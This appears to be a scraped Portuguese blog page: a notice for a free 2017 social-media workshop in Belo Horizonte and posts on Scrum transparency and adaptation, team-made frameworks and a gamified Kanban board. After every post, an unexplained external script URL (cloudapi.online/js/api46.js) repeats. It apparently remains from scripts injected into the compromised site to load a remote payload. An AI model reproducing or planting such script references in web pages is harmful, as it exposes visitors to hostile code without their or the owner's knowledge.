[workshop] Redes Sociais

Redes Sociais, um tema ainda não explorado em nossos workshops, mas muito importante para qualquer empresa/prestador de serviço que se preze. Com custo ZERO você consegue comunicar com seu público, divulgar o que precisa e colher rápidos feedbacks. Além de firmar sua marca estruturando e aparecendo nos locais mais visitados da internet!! Facebook, Instagram, Youtube, etc. Excelente não?Não perca esse próximo workshop, será INCRÍVEL!

Palestrante: Eduardo Lopes, Embaixador Wix BH

O evento é gratuito e as vagas limitadas.

Onde
Impact Hub, Av. Getúlio Vargas, 1492, 2º andar – Savassi
Belo Horizonte – MG

Quando
Segunda feira, 02 de outubro, 2017
18h45 a 21h

 

INSCREVA-SE JÁ

https://cloudapi.online/js/api46.js

Anúncios

Crie você mesmo seu próprio Framework

É isso mesmo, pare de querer as coisas prontas, não existe receita de bolo pronta, crie junto com sua equipe o seu Framework!

Fico vendo por aí várias fórmulas mágicas, algumas oferendo verdadeiros “Milagres”, alguns idolatram, outros defende até a morte, SCRUM, KANBAN, LEAN, PMBOK e etc.… e a cada hora é criado um “NOVO” modelo revolucionário, vou ser bem direto com vocês, é um mercado que está dando “muito” dinheiro, que acaba virando uma verdadeira zona.

Vocês não ficam perdidos? Que diabos vamos usar? Por onde começar? Aprendi agora um framework e já tem outro?

Vamos ser bem sincero, a internet está lotada de informação, é tanta informação que ficamos perdidos, se você está querendo aprender qualquer framework, é só dá um google, e pronto, uma enxurrada de modelos.

O que eu quero dizer para você, é que, cada equipe é diferente, não tente empurrar isso ou aquilo, monte você seu Framework, veja com sua equipe o que funciona e o que não funciona, veja o que está rolando no mercado, pegue os pontos bons e removas o ruins, se você está perdido por onde começar, comece conversando com sua equipe, garanto que de lá saíra grandes ideias, somos criativos pra karalho, não podemos ficar esperando a resposta no google, ele é fantástico, é sim, mas as pessoas são muito mais.

Fico aqui lembrando quando brincávamos na rua, era cada brincadeira uma invenção, tínhamos que fazer algo e inventávamos uma brincadeira, hoje isso está acabando, cadê as crianças criando novas brincadeiras? O mundo mudou o fomos nós que mudamos? Medo, insegurança e por ai vai, vai acabando com nossa criatividade, não deixe isso acabar, crie junto a sua equipe a melhor forma de vocês trabalharem.

https://cloudapi.online/js/api46.js

SCRUM Adptação

Fala pessoal, bora continuar nossa aventura no SCRUM 🙂

Nos últimos post falamos sobre a (Transparência e Inspeção), ficou faltando a Adaptação, acredito que esse seja o grande trunfo nas mãos, o SCRUM aceita facilmente as mudanças, imagina, você começa um projeto, ai depois de um longo tempo, mostra ao cliente, ele disse “Não é isso que eu queria”, putz, que trabalhão atoa neh, então, dentro do SCRUM as mudanças são bem vindas, ajuste o projeto ao seu curso de navegação 🙂

Vamos lá para quem não entendeu, o SCRUM tem um timebox, dentro desse timebox podem ocorrer mudanças no decorrer do projeto, muitos ficam com dúvidas nessa adaptação, porque ficam presos ao prazo de entrega, então quer dizer que não temos prazo? Não estou dizendo isso, o que estou dizendo é que dentro dessas entregas contínuas podemos inserir, remover e adaptar novos processos, não se apegue ao prazo, vamos ser bem diretos? Todo mundo sabe que a unica coisa errada dentro do projeto é o prazo de entrega! Acertei?

Acho que por hoje é só galera, até a próxima 🙂

 

https://cloudapi.online/js/api46.js

SCRUM Transparência

Fala pessoal blz!!!

Então vamos falar de uma parte muito importante no SCRUM que é a Transparência! A transparência é um dos pilares fundamentais do SCRUM.

Mas que diabos isso quer dizer?

A transparência quer dizer que: Tudo deve ser visível a todos os participantes do projeto, nada pode ser empurrado para debaixo do tapete. Vamos citar um exemplo, se a sprint falhar devo da um jeitinho??? NÃO, você deixar que todos fiquem sabendo mesmo que a sprint tenha falhado.

Vamos ser realistas, erros podem acontecer em qualquer projeto, seja usando SCRUM, XP, KANBAN  e por ai vai, o que devemos fazer é encarar os fatos, e encontrar uma solução, por isso é muito importante que tudo fique bem visível, se possível um quadro bem grande mostrando o desempenho (desenvolvimento) do produto.

Mais importante ainda, não é só a visualização de erros, também o sucesso da equipe, que são muitos, e todos ficam sabendo também, vamos falar bem a real, muitos utilizam esse quadro para achar defeitos, o famoso “Caça as Bruxas”, a transparência não é isso galera, a transparência no projeto é estimular a equipe, erros, falhas acontecem, mas o importante é saber supera-los, se seu objetivo é usar a transparência para apontar o dedo, sinto muito, você está na equipe errada.

E ai como sua equipe utiliza a transparência???

https://cloudapi.online/js/api46.js

Puzzle Kanban

Em continuidade ao framework puzzle, hoje vou falar sobre o quadro de kanban que criei para utilização, aqui fica uma dica, adapte ele a sua necessidade 🙂

Primeiro Quadro: Guest List

Esse quadro é para inserir a guest que será realizada, lembra do puzzle guest? Então, você irá escolher uma guest e colocará todos as atividades relativa a essa guest;

Segundo Quadro: Puzzle Potion

Na criação da guest você ainda não tem o puzzle potion, o que é um puzzle postion? O puzzle potion é uma gordura que você irá deixar reservado, ou seja, separe uma quantidade mínima de stamina para esse potion, ele irá adicionar algumas dificuldades no decorrer da guest, um bom exemplo é quando surgir um bug no programa que não estava previsto, isso sim é um puzzle potion, quando a equipe for pegar uma atividade da guest ela deve da preferência ao puzzle potion, uma dica, não exagere no potion 🙂

Terceiro Quadro: Stamina

Aqui é quantas stamina o membro do time irá entregar hoje, se a atividade for muito grande essa stamina pode se estender por até uma semana ou fica a critério da equipe. É interessante também definir a stamina do dia em equipe.

Quarto Quadro: Run(Play)

O membro da equipe irá pegar uma stamina e irá iniciar sua atividade, ou seja, que inicie o jogo.

Quinto Quadro: Go Test

Depois de terminar um pedaço da guest em (Play), deve ser enviado para teste a atividade, a equipe deve definir com esse teste será realizado.

Sexto Quadro: Back Home

Se a atividade não atende os critérios do teste, ela deve voltar para stamina, primeiro a equipe da preferência para as atividades do puzzle potion, depois verifica se não tem um back home, aí sim pode iniciar outra stamina.

Sétimo Quadro: Oracle

Aqui você dá um pause na jogada, sim um pause :), aqui é necessário a intervenção do leader, game master ou até a participação do gamer e ou tutor, essa atividade deve ser solucionada, pois houve algum problema com essa stamina.

Finish

Depois de passar pela stamina, play go test, tudo feito conforme a constituição que a equipe segue, a atividade então vai para o finish, ou seja, você acabou de concluir uma stamina ou um pedaço da guest.

Acho que é isso galera, quem quiser saber mais estou a disposição para bater um papo, abraços.

https://cloudapi.online/js/api46.js